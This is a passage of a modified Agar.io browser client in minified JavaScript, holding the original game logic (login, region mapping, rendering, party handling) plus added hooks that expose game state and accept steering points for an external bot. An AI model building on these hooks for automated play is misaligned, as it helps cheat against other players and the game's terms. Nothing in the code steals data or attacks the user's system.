var u = +e(".agario-exp-bar .progress-bar-text").first().text().split("/")[0],
c = +e(".agario-exp-bar .progress-bar-text").first().text().split("/")[1].split(" ")[0],
l = e(".agario-profile-panel .progress-bar-star").first().text();
if (l != a.e) S({
f: c,
d: c,
e: l
}, function() {
e(".agario-profile-panel .progress-bar-star").text(a.e);
e(".agario-exp-bar .progress-bar").css("width", "100%");
e(".progress-bar-star").addClass("animated tada").one("webkitAnimationEnd mozAnimationEnd MSAnimationEnd oanimationend animationend",
function() {
e(".progress-bar-star").removeClass("animated tada")
});
setTimeout(function() {
e(".agario-exp-bar .progress-bar-text").text(a.d + "/" + a.d + " XP");
S({
f: 0,
d: a.d,
e: a.e
}, function() {
S(a, b)
})
}, 1E3)
});
else {
var p = Date.now(),
g = function() {
var c;
c = (Date.now() - p) / 1E3;
c = 0 > c ? 0 : 1 < c ? 1 : c;
c = c * c * (3 - 2 * c);
e(".agario-exp-bar .progress-bar-text").text(~~(u + (a.f - u) * c) + "/" + a.d + " XP");
e(".agario-exp-bar .progress-bar").css("width", (88 * (u + (a.f - u) * c) / a.d).toFixed(2) + "%");
1 > c ? d.requestAnimationFrame(g) : b && b()
};
d.requestAnimationFrame(g)
}
} else e(".agario-profile-panel .progress-bar-star").text(a.e),
e(".agario-exp-bar .progress-bar-text").text(a.f + "/" + a.d + " XP"), e(".agario-exp-bar .progress-bar").css("width", (88 * a.f / a.d).toFixed(2) + "%"), b && b()
}
function jb(a) {
"string" == typeof a && (a = JSON.parse(a));
Date.now() + 18E5 > a.ja ? e("#helloContainer").attr("data-logged-in", "0") : (d.localStorage.loginCache = JSON.stringify(a), B = a.fa, e(".agario-profile-name").text(a.name), $a(), S({
f: a.f,
d: a.d,
e: a.e
}), e("#helloContainer").attr("data-logged-in", "1"))
}
function Eb(a) {
a = a.split("\n");
jb({
name: a[0],
ta: a[1],
fa: a[2],
ja: 1E3 *
+a[3],
e: +a[4],
f: +a[5],
d: +a[6]
});
console.log("Hello Facebook?");
}
function La(a) {
if ("connected" == a.status) {
var b = a.authResponse.accessToken;
d.FB.api("/me/picture?width=180&height=180", function(a) {
d.localStorage.fbPictureCache = a.data.url;
e(".agario-profile-picture").attr("src", a.data.url)
});
e("#helloContainer").attr("data-logged-in", "1");
null != B ? e.ajax("https://m.agar.io/checkToken", {
error: function() {
console.log("Facebook Fail!");
B = null;
La(a)
},
success: function(a) {
a = a.split("\n");
S({
e: +a[0],
f: +a[1],
d: +a[2]
});
console.log("Facebook connected!");
},
dataType: "text",
method: "POST",
cache: !1,
crossDomain: !0,
data: B
}) : e.ajax("https://m.agar.io/facebookLogin", {
error: function() {
console.log("You have a Facebook problem!");
B = null;
e("#helloContainer").attr("data-logged-in", "0")
},
success: Eb,
dataType: "text",
method: "POST",
cache: !1,
crossDomain: !0,
data: b
})
}
}
function Wa(a) {
Y(":party");
e("#helloContainer").attr("data-party-state", "4");
a = decodeURIComponent(a).replace(/.*#/gim, "");
Ma("#" + d.encodeURIComponent(a));
e.ajax(Na + "//m.agar.io/getToken", {
error: function() {
e("#helloContainer").attr("data-party-state", "6")
},
success: function(b) {
b = b.split("\n");
e(".partyToken").val("<PASSWORD>/#" +
d.encodeURIComponent(a));
e("#helloContainer").attr("data-party-state", "5");
Y(":party");
Ca("ws://" + b[0], a)
},
dataType: "text",
method: "POST",
cache: !1,
crossDomain: !0,
data: a
})
}
function Ma(a) {
d.history && d.history.replaceState && d.history.replaceState({}, d.document.title, a)
}
if (!d.agarioNoInit) {
var Na = d.location.protocol,
tb = "https:" == Na,
xa = d.navigator.userAgent;
if (-1 != xa.indexOf("Android")) d.ga && d.ga("send", "event", "MobileRedirect", "PlayStore"), setTimeout(function() {
d.location.href = "market://details?id=com.miniclip.agar.io"
},
1E3);
else if (-1 != xa.indexOf("iPhone") || -1 != xa.indexOf("iPad") || -1 != xa.indexOf("iPod")) d.ga && d.ga("send", "event", "MobileRedirect", "AppStore"), setTimeout(function() {
d.location.href = "https://itunes.apple.com/app/agar.io/id995999703"
}, 1E3);
else {
var za, f, G, m, r, X = null,
//UPDATE
toggle = false,
toggleDraw = true,
toggleFollow = false,
tempPoint = [0, 0, 1],
dPoints = [],
circles = [],
dArc = [],
dText = [],
lines = [],
names = ["<EMAIL>"],
originalName = names[Math.floor(Math.random() * names.length)],
sessionScore = 0,
serverIP = "",
interNodes = [],
lifeTimer = new Date(),
bestTime = 0,
botIndex = 0,
reviving = false,
message = [],
selectedCell = 0,
q = null,
s = 0,
t = 0,
M = [],
k = [],
E = {},
v = [],
Q = [],
F = [],
fa = 0,
ga = 0,
//UPDATE
ia = [-1],
ja = [-1],
zb = 0,
C = 0,
ib = 0,
K = null,
pa = 0,
qa = 0,
ra = 1E4,
sa = 1E4,
h = 1,
y = null,
kb = !0,
wa = !0,
Oa = !1,
Ha = !1,
R = 0,
ta = !1,
lb = !1,
aa = s = ~~((pa + ra) / 2),
ba = t = ~~((qa + sa) / 2),
ca = 1,
P = "",
A = null,
ya = !1,
Ga = !1,
Ea = 0,
Fa =
0,
na = 0,
oa = 0,
mb = 0,
Db = ["#333333", "#FF3333", "#33FF33", "#3333FF"],
Ia = !1,
$ = !1,
bb = 0,
B = null,
J = 1,
x = 1,
W = !0,
Ba = 0,
Da = {};
(function() {
var a = d.location.search;
"?" == a.charAt(0) && (a = a.slice(1));
for (var a = a.split("&"), b = 0; b < a.length; b++) {
var c = a[b].split("=");
Da[c[0]] = c[1]
}
})();
var Qa = "ontouchstart" in d && /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(d.navigator.userAgent),
Ja = new Image;
Ja.src = "img/split.png";
var nb = document.createElement("canvas");
if ("undefined" == typeof console || "undefined" ==
typeof DataView || "undefined" == typeof WebSocket || null == nb || null == nb.getContext || null == d.localStorage) alert("You browser does not support this game, we recommend you to use Firefox to play this");
else {
var ka = null;
d.setNick = function(a) {
//UPDATE
originalName = a;
if (getPlayer().length == 0) {
lifeTimer = new Date();
}
Xa();
K = a;
cb();
R = 0
};
d.setRegion = ha;
d.setSkins = function(a) {
kb = a
};
d.setNames = function(a) {
wa = a
};
d.setDarkTheme = function(a) {
ta = a
};
d.setColors = function(a) {
Oa = a
};
d.setShowMass = function(a) {
lb = a
};
d.spectate = function() {
K = null;
H(1);
Xa()
};
d.setGameMode = function(a) {
a != P && (":party" ==
P && e("#helloContainer").attr("data-party-state", "0"), Y(a), ":party" != a && I())
};
d.setAcid = function(a) {
Ia = a
};
null != d.localStorage && (null == d.localStorage.AB9 && (d.localStorage.AB9 = 0 + ~~(100 * Math.random())), mb = +d.localStorage.AB9, d.ABGroup = mb);
e.get(Na + "//gc.agar.io", function(a) {
var b = a.split(" ");
a = b[0];
b = b[1] || ""; - 1 == ["UA"].indexOf(a) && ob.push("ussr");
ea.hasOwnProperty(a) && ("string" == typeof ea[a] ? y || ha(ea[a]) : ea[a].hasOwnProperty(b) && (y || ha(ea[a][b])))
}, "text");
d.ga && d.ga("send", "event", "User-Agent", d.navigator.userAgent, {
nonInteraction: 1
});
var la = !1,
Ya = 0;
setTimeout(function() {
la = !0
}, Math.max(6E4 * Ya, 1E4));
var ea = {
AF: "JP-Tokyo",
AX: "EU-London",
AL: "EU-London",
DZ: "EU-London",
AS: "SG-Singapore",
AD: "EU-London",
AO: "EU-London",
AI: "US-Atlanta",
AG: "US-Atlanta",
AR: "BR-Brazil",
AM: "JP-Tokyo",
AW: "US-Atlanta",
AU: "SG-Singapore",
AT: "EU-London",
AZ: "JP-Tokyo",
BS: "US-Atlanta",
BH: "JP-Tokyo",
BD: "JP-Tokyo",
BB: "US-Atlanta",
BY: "EU-London",
BE: "EU-London",
BZ: "US-Atlanta",
BJ: "EU-London",
BM: "US-Atlanta",
BT: "JP-Tokyo",
BO: "BR-Brazil",
BQ: "US-Atlanta",
BA: "EU-London",
BW: "EU-London",
BR: "BR-Brazil",
IO: "JP-Tokyo",
VG: "US-Atlanta",
BN: "JP-Tokyo",
BG: "EU-London",
BF: "EU-London",
BI: "EU-London",
KH: "JP-Tokyo",
CM: "EU-London",
CA: "US-Atlanta",
CV: "EU-London",
KY: "US-Atlanta",
CF: "EU-London",
TD: "EU-London",
CL: "BR-Brazil",
CN: "CN-China",
CX: "JP-Tokyo",
CC: "JP-Tokyo",
CO: "BR-Brazil",
KM: "EU-London",
CD: "EU-London",
CG: "EU-London",
CK: "SG-Singapore",
CR: "US-Atlanta",
CI: "EU-London",
HR: "EU-London",
CU: "US-Atlanta",
CW: "US-Atlanta",
CY: "JP-Tokyo",
CZ: "EU-London",
DK: "EU-London",
DJ: "EU-London",
DM: "US-Atlanta",
DO: "US-Atlanta",
EC: "BR-Brazil",
EG: "EU-London",
SV: "US-Atlanta",
GQ: "EU-London",
ER: "EU-London",
EE: "EU-London",
ET: "EU-London",
FO: "EU-London",
FK: "BR-Brazil",
FJ: "SG-Singapore",
FI: "EU-London",
FR: "EU-London",
GF: "BR-Brazil",
PF: "SG-Singapore",
GA: "EU-London",
GM: "EU-London",
GE: "JP-Tokyo",
DE: "EU-London",
GH: "EU-London",
GI: "EU-London",
GR: "EU-London",
GL: "US-Atlanta",
GD: "US-Atlanta",
GP: "US-Atlanta",
GU: "SG-Singapore",
GT: "US-Atlanta",
GG: "EU-London",
GN: "EU-London",
GW: "EU-London",
GY: "BR-Brazil",
HT: "US-Atlanta",
VA: "EU-London",
HN: "US-Atlanta",
HK: "JP-Tokyo",
HU: "EU-London",
IS: "EU-London",
IN: "JP-Tokyo",
ID: "JP-Tokyo",
IR: "JP-Tokyo",
IQ: "JP-Tokyo",
IE: "EU-London",
IM: "EU-London",
IL: "JP-Tokyo",
IT: "EU-London",
JM: "US-Atlanta",
JP: "JP-Tokyo",
JE: "EU-London",
JO: "JP-Tokyo",
KZ: "JP-Tokyo",
KE: "EU-London",
KI: "SG-Singapore",
KP: "JP-Tokyo",
KR: "JP-Tokyo",
KW: "JP-Tokyo",
KG: "JP-Tokyo",
LA: "JP-Tokyo",
LV: "EU-London",
LB: "JP-Tokyo",
LS: "EU-London",
LR: "EU-London",
LY: "EU-London",
LI: "EU-London",
LT: "EU-London",
LU: "EU-London",
MO: "JP-Tokyo",
MK: "EU-London",
MG: "EU-London",
MW: "EU-London",
MY: "JP-Tokyo",
MV: "JP-Tokyo",
ML: "EU-London",
MT: "EU-London",
MH: "SG-Singapore",
MQ: "US-Atlanta",
MR: "EU-London",
MU: "EU-London",
YT: "EU-London",
MX: "US-Atlanta",
FM: "SG-Singapore",
MD: "EU-London",
MC: "EU-London",
MN: "JP-Tokyo",
ME: "EU-London",
MS: "US-Atlanta",
MA: "EU-London",
MZ: "EU-London",
MM: "JP-Tokyo",
NA: "EU-London",
NR: "SG-Singapore",
NP: "JP-Tokyo",
NL: "EU-London",
NC: "SG-Singapore",
NZ: "SG-Singapore",
NI: "US-Atlanta",
NE: "EU-London",
NG: "EU-London",
NU: "SG-Singapore",
NF: "SG-Singapore",
MP: "SG-Singapore",
NO: "EU-London",
OM: "JP-Tokyo",
PK: "JP-Tokyo",
PW: "SG-Singapore",
PS: "JP-Tokyo",
PA: "US-Atlanta",
PG: "SG-Singapore",
PY: "BR-Brazil",
PE: "BR-Brazil",
PH: "JP-Tokyo",
PN: "SG-Singapore",
PL: "EU-London",
PT: "EU-London",
PR: "US-Atlanta",
QA: "JP-Tokyo",
RE: "EU-London",
RO: "EU-London",
RU: "RU-Russia",
RW: "EU-London",
BL: "US-Atlanta",
SH: "EU-London",
KN: "US-Atlanta",
LC: "US-Atlanta",
MF: "US-Atlanta",
PM: "US-Atlanta",
VC: "US-Atlanta",
WS: "SG-Singapore",
SM: "EU-London",
ST: "EU-London",
SA: "EU-London",
SN: "EU-London",
RS: "EU-London",
SC: "EU-London",
SL: "EU-London",
SG: "JP-Tokyo",
SX: "US-Atlanta",
SK: "EU-London",
SI: "EU-London",
SB: "SG-Singapore",
SO: "EU-London",
ZA: "EU-London",
SS: "EU-London",
ES: "EU-London",
LK: "JP-Tokyo",
SD: "EU-London",
SR: "BR-Brazil",
SJ: "EU-London",
SZ: "EU-London",
SE: "EU-London",
CH: "EU-London",
SY: "EU-London",
TW: "JP-Tokyo",
TJ: "JP-Tokyo",
TZ: "EU-London",
TH: "JP-Tokyo",
TL: "JP-Tokyo",
TG: "EU-London",
TK: "SG-Singapore",
TO: "SG-Singapore",
TT: "US-Atlanta",
TN: "EU-London",
TR: "TK-Turkey",
TM: "JP-Tokyo",
TC: "US-Atlanta",
TV: "SG-Singapore",
UG: "EU-London",
UA: "EU-London",
AE: "EU-London",
GB: "EU-London",
US: "US-Atlanta",
UM: "SG-Singapore",
VI: "US-Atlanta",
UY: "BR-Brazil",
UZ: "JP-Tokyo",
VU: "SG-Singapore",
VE: "BR-Brazil",
VN: "JP-Tokyo",
WF: "SG-Singapore",
EH: "EU-London",
YE: "JP-Tokyo",
ZM: "EU-London",
ZW: "EU-London"
},
L = null;
d.connect = Ca;
//UPDATE
window.getDarkBool = function() {
return ta;
}
window.getMassBool = function() {
return lb;
}
window.getMemoryCells = function() {
return interNodes;
}
window.getCellsArray = function() {
return v;
}
window.getCells = function() {
return E;
}
window.getPlayer = function() {
return k;
}
window.getWidth = function() {
return m;
}
window.getHeight = function() {
return r;
}
window.getRatio = function() {
return h;
}
window.getOffsetX = function() {
return aa;
}
window.getOffsetY = function() {
return ba;
}
window.getX = function() {
return s;
}
window.getY = function() {
return t;
}
window.getPointX = function() {
return ia[0];
}
window.getPointY = function() {
return ja[0];
}
window.getMouseX = function() {
return fa;
}
window.getMouseY = function() {
return ga;
}
window.getMapStartX = function() {
return pa;
}
window.getMapStartY = function() {
return qa;
}
window.getMapEndX = function() {
return ra;
}
window.getMapEndY = function() {
return sa;
}
window.getScreenDistance = function() {
var temp = screenDistance();
return temp;
}
window.getLastUpdate = function() {
return C;
}
window.getCurrentScore = function() {
return R;
}
window.getMode = function() {
return P;
}
window.setPoint = function(x, y, index) {
while (ia.length > getPlayer().length) {
ia.pop();
ja.pop();
}
if (index < ia.length) {
ia[index] = x;
ja[index] = y;
} else {
while (index < ia.length - 1) {
ia.push(-1);
ja.push(-1);
}
ia.push(x);
ja.push(y);
}
}
window.setScore = function(a) {
sessionScore = a * 100;
}
window.setBestTime = function(a) {
bestTime = a;
}
window.best = function(a, b) {
setScore(a);
setBestTime(b);
}
window.setBotIndex = function(a) {
console.log("Changing bot");
botIndex = a;
}
window.setMessage = function(a) {
message = a;
}
var ma = 500,
eb = -1,
fb = -1,
z = null,
D = 1,
ua = null,
Ua = function() {
var a = Date.now(),
b = 1E3 / 60;
return function() {
d.requestAnimationFrame(Ua);
var c = Date.now(),
l = c - a;
l > b && (a = c - l % b, !T() || 240 > Date.now() - bb ? gb() : console.warn("Skipping draw"), Fb())
}
}(),
U = {},
ob = "agariotool.com;poland;usa;china;russia;canada;australia;spain;brazil;germany;ukraine;france;sweden;chaplin;north korea;south korea;japan;united kingdom;earth;greece;latvia;lithuania;estonia;finland;norway;cia;maldivas;austria;nigeria;reddit;yaranaika;confederate;9gag;indiana;4chan;italy;bulgaria;tumblr;2ch.hk;hong kong;portugal;jamaica;german empire;mexico;sanik;switzerland;croatia;chile;indonesia;bangladesh;thailand;iran;iraq;peru;moon;botswana;bosnia;netherlands;european union;taiwan;pakistan;hungary;satanist;qing dynasty;matriarchy;patriarchy;feminism;ireland;texas;facepunch;prodota;cambodia;steam;piccolo;ea;india;kc;denmark;quebec;ayy lmao;sealand;bait;tsarist russia;origin;vinesauce;stalin;belgium;luxembourg;stussy;prussia;8ch;argentina;scotland;sir;romania;belarus;wojak;doge;nasa;byzantium;imperial japan;french kingdom;somalia;turkey;mars;pokerface;8;irs;receita federal;facebook".split(";"),
Gb = ["8", "nasa"],
Hb = ["m'blob"];
Ka.prototype = {
V: null,
x: 0,
y: 0,
i: 0,
b: 0
};
da.prototype = {
id: 0,
a: null,
name: null,
o: null,
O: null,
x: 0,
y: 0,
size: 0,
s: 0,
t: 0,
r: 0,
J: 0,
K: 0,
q: 0,
ba: 0,
Q: 0,
sa: 0,
ia: 0,
G: !1,
h: !1,
n: !1,
R: !0,
Y: 0,
//UPDATE
updateCode: 0,
danger: false,
dangerTimeOut: 0,
isVirus: function() {
return this.h;
},
getUptimeTime: function() {
return this.Q;
},
X: function() {
var a;
for (a = 0; a < v.length; a++)
if (v[a] == this) {
v.splice(a, 1);
break
}
delete E[this.id];
a = k.indexOf(this); - 1 != a && (Ha = !0, k.splice(a, 1));
a = M.indexOf(this.id); - 1 != a && M.splice(a, 1);
this.G = !0;
0 < this.Y && Q.push(this)
},
l: function() {
return Math.max(~~(.3 * this.size), 24)
},
B: function(a) {
if (this.name = a) null ==
this.o ? this.o = new va(this.l(), "#FFFFFF", !0, "#000000") : this.o.M(this.l()), this.o.C(this.name)
},
W: function() {
for (var a = this.I(); this.a.length > a;) {
var b = ~~(Math.random() * this.a.length);
this.a.splice(b, 1)
}
for (0 == this.a.length && 0 < a && this.a.push(new Ka(this, this.x, this.y, this.size, Math.random() - .5)); this.a.length < a;) b = ~~(Math.random() * this.a.length), b = this.a[b], this.a.push(new Ka(this, b.x, b.y, b.i, b.b))
},
I: function() {
var a = 10;
20 > this.size && (a = 0);
this.h && (a = 30);
var b = this.size;
this.h || (b *= h);
b *= D;
this.ba &
32 && (b *= .25);
return ~~Math.max(b, a)
},
qa: function() {
this.W();
for (var a = this.a, b = a.length, c = 0; c < b; ++c) {
var d = a[(c - 1 + b) % b].b,
e = a[(c + 1) % b].b;
a[c].b += (Math.random() - .5) * (this.n ? 3 : 1);
a[c].b *= .7;
10 < a[c].b && (a[c].b = 10); - 10 > a[c].b && (a[c].b = -10);
a[c].b = (d + e + 8 * a[c].b) / 10
}
for (var p = this, g = this.h ? 0 : (this.id / 1E3 + C / 1E4) % (2 * Math.PI), c = 0; c < b; ++c) {
var f = a[c].i,
d = a[(c - 1 + b) % b].i,
e = a[(c + 1) % b].i;
if (15 < this.size && null != X && 20 < this.size * h && 0 < this.id) {
var k = !1,
w = a[c].x,
m = a[c].y;
X.ra(w - 5, m - 5, 10, 10, function(a) {
a.V != p && 25 > (w -
a.x) * (w - a.x) + (m - a.y) * (m - a.y) && (k = !0)
});
!k && (a[c].x < pa || a[c].y < qa || a[c].x > ra || a[c].y > sa) && (k = !0);
k && (0 < a[c].b && (a[c].b = 0), a[c].b -= 1)
}
f += a[c].b;
0 > f && (f = 0);
f = this.n ? (19 * f + this.size) / 20 : (12 * f + this.size) / 13;
a[c].i = (d + e + 8 * f) / 10;
d = 2 * Math.PI / b;
e = this.a[c].i;
this.h && 0 == c % 2 && (e += 5);
a[c].x = this.x + Math.cos(d * c + g) * e;
a[c].y = this.y + Math.sin(d * c + g) * e
}
},
P: function() {
if (0 >= this.id) return 1;
var a;
a = (C - this.Q) / 120;
a = 0 > a ? 0 : 1 < a ? 1 : a;
var b = 0 > a ? 0 : 1 < a ? 1 : a;
this.l();
if (this.G && 1 <= b) {
var c = Q.indexOf(this); - 1 != c && Q.splice(c, 1)
}
this.x =
a * (this.J - this.s) + this.s;
this.y = a * (this.K - this.t) + this.t;
this.size = b * (this.q - this.r) + this.r;
return b
},
N: function() {
return 0 >= this.id ? !0 : this.x + this.size + 40 < s - m / 2 / h || this.y + this.size + 40 < t - r / 2 / h || this.x - this.size - 40 > s + m / 2 / h || this.y - this.size - 40 > t + r / 2 / h ? !1 : !0
},
w: function(a) {
if (this.N()) {
++this.Y;
var b = 0 < this.id && !this.h && !this.n && .4 > h;
5 > this.I() && (b = !0);
if (this.R && !b)
for (var c = 0; c < this.a.length; c++) this.a[c].i = this.size;
this.R = b;
a.save();
this.ia = C;
c = this.P();
this.G && (a.globalAlpha *= 1 - c);
a.lineWidth =
10;
a.lineCap = "round";
a.lineJoin = this.h ? "miter" : "round";
Oa ? (a.fillStyle = "#FFFFFF", a.strokeStyle = "#AAAAAA") : (a.fillStyle = this.color, a.strokeStyle = this.color);
if (b) a.beginPath(), a.arc(this.x, this.y, this.size + 5, 0, 2 * Math.PI, !1);
else {
this.qa();
a.beginPath();
var d = this.I();
a.moveTo(this.a[0].x, this.a[0].y);
for (c = 1; c <= d; ++c) {
var e = c % d;
a.lineTo(this.a[e].x, this.a[e].y)
}
}
a.closePath();
d = this.name.toLowerCase();
!this.n && kb && ":teams" != P ? -1 != ob.indexOf(d) ? (U.hasOwnProperty(d) || (U[d] = new Image, (U[d].src = "http://i.imgur.com/6rRTTP7.gif")), c = 0 != U[d].width && U[d].complete ? U[d] : null) : c = null : c = null;
c = (e = c) ? -1 != Hb.indexOf(d) : !1;
b || a.stroke();
a.fill();
null == e || c || (a.save(), a.clip(), a.drawImage(e, this.x - this.size, this.y - this.size, 2 * this.size, 2 * this.size), a.restore());
(Oa || 15 < this.size) && !b && (a.strokeStyle = "#000000", a.globalAlpha *= .1, a.stroke());
a.globalAlpha = 1;
null != e && c && a.drawImage(e, this.x - 2 * this.size, this.y - 2 * this.size, 4 * this.size, 4 * this.size);
c = -1 != k.indexOf(this);
b = ~~this.y;
if (0 != this.id && (wa || c) && this.name && this.o && (null ==
e || -1 == Gb.indexOf(d))) {
e = this.o;
e.C(this.name);
e.M(this.l());
d = 0 >= this.id ? 1 : Math.ceil(10 * h) / 10;
e.ea(d);
var e = e.L(),
p = ~~(e.width / d),
g = ~~(e.height / d);
a.drawImage(e, ~~this.x - ~~(p / 2), b - ~~(g / 2), p, g);
b += e.height / 2 / d + 4
}
0 < this.id && lb && (c || 0 == k.length && (!this.h || this.n) && 20 < this.size) && (null == this.O && (this.O = new va(this.l() / 2, "#FFFFFF", !0, "#000000")), c = this.O, c.M(this.l() / 2), c.C(~~(this.size * this.size / 100)), d = Math.ceil(10 * h) / 10, c.ea(d), e = c.L(), p = ~~(e.width / d), g = ~~(e.height / d), a.drawImage(e, ~~this.x - ~~(p / 2),
b - ~~(g / 2), p, g));
a.restore()
}
}
};
va.prototype = {
F: "",
S: "#000000",
U: !1,
v: "#000000",
u: 16,
p: null,
T: null,
k: !1,
D: 1,
M: function(a) {
this.u != a && (this.u = a, this.k = !0)
},
ea: function(a) {
this.D != a && (this.D = a, this.k = !0)
},
setStrokeColor: function(a) {
this.v != a && (this.v = a, this.k = !0)
},
C: function(a) {
a != this.F && (this.F = a, this.k = !0)
},
L: function() {
null == this.p && (this.p = document.createElement("canvas"), this.T = this.p.getContext("2d"));
if (this.k) {
this.k = !1;
var a = this.p,
b = this.T,
c = this.F,
d = this.D,
e = this.u,
p = e + "px Ubuntu";
b.font =
p;
var g = ~~(.2 * e);
a.width = (b.measureText(c).width + 6) * d;
a.height = (e + g) * d;
b.font = p;
b.scale(d, d);
b.globalAlpha = 1;
b.lineWidth = 3;
b.strokeStyle = this.v;
b.fillStyle = this.S;
this.U && b.strokeText(c, 3, e - g / 2);
b.fillText(c, 3, e - g / 2)
}
return this.p
}
};
Date.now || (Date.now = function() {
return (new Date).getTime()
});
(function() {
for (var a = ["ms", "moz", "webkit", "o"], b = 0; b < a.length && !d.requestAnimationFrame; ++b) d.requestAnimationFrame = d[a[b] + "RequestAnimationFrame"], d.cancelAnimationFrame = d[a[b] + "CancelAnimationFrame"] || d[a[b] +
"CancelRequestAnimationFrame"];
d.requestAnimationFrame || (d.requestAnimationFrame = function(a) {
return setTimeout(a, 1E3 / 60)
}, d.cancelAnimationFrame = function(a) {
clearTimeout(a)
})
})();
var rb = {
ka: function(a) {
function b(a, b, c, d, e) {
this.x = a;
this.y = b;
this.j = c;
this.g = d;
this.depth = e;
this.items = [];
this.c = []
}
var c = a.ma || 2,
d = a.na || 4;
b.prototype = {
x: 0,
y: 0,
j: 0,
g: 0,
depth: 0,
items: null,
c: null,
H: function(a) {
for (var b = 0; b < this.items.length; ++b) {
var c = this.items[b];
if (c.x >= a.x && c.y >= a.y && c.x < a.x + a.j && c.y < a.y + a.g) return !0
}
if (0 !=
this.c.length) {
var d = this;
return this.$(a, function(b) {
return d.c[b].H(a)
})
}
return !1
},
A: function(a, b) {
for (var c = 0; c < this.items.length; ++c) b(this.items[c]);
if (0 != this.c.length) {
var d = this;
this.$(a, function(c) {
d.c[c].A(a, b)
})
}
},
m: function(a) {
0 != this.c.length ? this.c[this.Z(a)].m(a) : this.items.length >= c && this.depth < d ? (this.ha(), this.c[this.Z(a)].m(a)) : this.items.push(a)
},
Z: function(a) {
return a.x < this.x + this.j / 2 ? a.y < this.y + this.g / 2 ? 0 : 2 : a.y < this.y + this.g / 2 ? 1 : 3
},
$: function(a, b) {
return a.x < this.x + this.j / 2 &&
(a.y < this.y + this.g / 2 && b(0) || a.y >= this.y + this.g / 2 && b(2)) || a.x >= this.x + this.j / 2 && (a.y < this.y + this.g / 2 && b(1) || a.y >= this.y + this.g / 2 && b(3)) ? !0 : !1
},
ha: function() {
var a = this.depth + 1,
c = this.j / 2,
d = this.g / 2;
this.c.push(new b(this.x, this.y, c, d, a));
this.c.push(new b(this.x + c, this.y, c, d, a));
this.c.push(new b(this.x, this.y + d, c, d, a));
this.c.push(new b(this.x + c, this.y + d, c, d, a));
a = this.items;
this.items = [];
for (c = 0; c < a.length; c++) this.m(a[c])
},
clear: function() {
for (var a = 0; a < this.c.length; a++) this.c[a].clear();
this.items.length =
0;
this.c.length = 0
}
};
var e = {
x: 0,
y: 0,
j: 0,
g: 0
};
return {
root: new b(a.ca, a.da, a.oa - a.ca, a.pa - a.da, 0),
m: function(a) {
this.root.m(a)
},
A: function(a, b) {
this.root.A(a, b)
},
ra: function(a, b, c, d, f) {
e.x = a;
e.y = b;
e.j = c;
e.g = d;
this.root.A(e, f)
},
H: function(a) {
return this.root.H(a)
},
clear: function() {
this.root.clear()
}
}
}
},
db = function() {
var a = new da(0, 0, 0, 32, "#ED1C24", ""),
b = document.createElement("canvas");
b.width = 32;
b.height = 32;
var c = b.getContext("2d");
return function() {
0 < k.length && (a.color = k[0].color, a.B(k[0].name));
c.clearRect(0,
0, 32, 32);
c.save();
c.translate(16, 16);
c.scale(.4, .4);
a.w(c);
c.restore();
var d = document.getElementById("favicon"),
e = d.cloneNode(!0);
//UPDATE -- NO IDEA WHAT I JUST DID THERE!
//e.setAttribute("href", b.toDataURL("image/png"));
d.parentNode.replaceChild(e, d)
}
}();
e(function() {
db()
});
e(function() {
+d.localStorage.wannaLogin && (d.localStorage.loginCache && jb(d.localStorage.loginCache), d.localStorage.fbPictureCache && e(".agario-profile-picture").attr("src", d.localStorage.fbPictureCache))
});
d.facebookLogin = function() {
d.localStorage.wannaLogin = 1
};
d.fbAsyncInit =
function() {
function a() {
d.localStorage.wannaLogin = 1;
null == d.FB ? alert("You seem to have something blocking Facebook on your browser, please check for any extensions") : d.FB.login(function(a) {
La(a)
}, {
scope: "public_profile, email"
})
}
d.FB.init({
appId: "677505792353827",
cookie: !0,
xfbml: !0,
status: !0,
version: "v2.2"
});
d.FB.Event.subscribe("auth.statusChange", function(b) {
+d.localStorage.wannaLogin && ("connected" == b.status ? La(b) : a())
});
d.facebookLogin = a
};
d.logout = function() {
B = null;
e("#helloContainer").attr("data-logged-in",
"0");
e("#helloContainer").attr("data-has-account-data", "0");
delete d.localStorage.wannaLogin;
delete d.localStorage.loginCache;
delete d.localStorage.fbPictureCache;
I()
};
var Fb = function() {
function a(a, b, c, d, e) {
var f = b.getContext("2d"),
h = b.width;
b = b.height;
a.color = e;
a.B(c);
a.size = d;
f.save();
f.translate(h / 2, b / 2);
a.w(f);
f.restore()
}
var b = new da(0, 0, 0, 32, "#5bc0de", "");
b.id = -1;
var c = new da(0, 0, 0, 32, "#5bc0de", "");
c.id = -1;
var d = document.createElement("canvas");
d.getContext("2d");
d.width = d.height = 70;
a(c, d,
"", 26, "#ebc0de");
return function() {
e(".cell-spinner").filter(":visible").each(function() {
var c = e(this),
f = Date.now(),
g = this.width,
h = this.height,
k = this.getContext("2d");
k.clearRect(0, 0, g, h);
k.save();
k.translate(g / 2, h / 2);
for (var m = 0; 10 > m; ++m) k.drawImage(d, (.1 * f + 80 * m) % (g + 140) - g / 2 - 70 - 35, h / 2 * Math.sin((.001 * f + m) % Math.PI * 2) - 35, 70, 70);
k.restore();
(c = c.attr("data-itr")) && (c = Z(c));
a(b, this, c || "", +e(this).attr("data-size"), "#5bc0de")
})
}
}();
d.createParty = function() {
Y(":party");
L = function(a) {
Ma("/#" + d.encodeURIComponent(a));
e(".partyToken").val("<PASSWORD>/#" + d.encodeURIComponent(a));
e("#helloContainer").attr("data-party-state", "1")
};
I()
};
d.joinParty = Wa;
d.cancelParty = function() {
Ma("/");
e("#helloContainer").attr("data-party-state", "0");
Y("");
I()
};
e(function() {
e(pb)
})
}
}
}
})(window, window.jQuery);
(function(i, s, o, g, r, a, m) {
i['GoogleAnalyticsObject'] = r;
i[r] = i[r] || function() {
(i[r].q = i[r].q || []).push(arguments)
}, i[r].l = 1 * new Date();
a = s.createElement(o),
m = s.getElementsByTagName(o)[0];
a.async = 1;
a.src = g;
m.parentNode.insertBefore(a, m)
})(window, document, 'script', '//www.google-analytics.com/analytics.js', 'apos');
apos('create', 'UA-64394184-1', 'auto');
apos('send', 'pageview');
window.ignoreStream = false;
window.refreshTwitch = function() {
$.ajax({
url: "https://api.twitch.tv/kraken/streams/apostolique",
cache: false,
dataType: "jsonp"
}).done(function(data) {
if (data["stream"] == null) {
//console.log("Apostolique is not online!");
window.setMessage([]);
window.onmouseup = function() {};
window.ignoreStream = false;
} else {
//console.log("Apostolique is online!");
if (!window.ignoreStream) {
window.setMessage(["twitch.tv/apostolique is online right now!", "Click the screen to open the stream!", "Press E to ignore."]);
window.onmouseup = function() {
window.open("http://www.twitch.tv/apostolique");
};
}
}
}).fail(function() {});
}
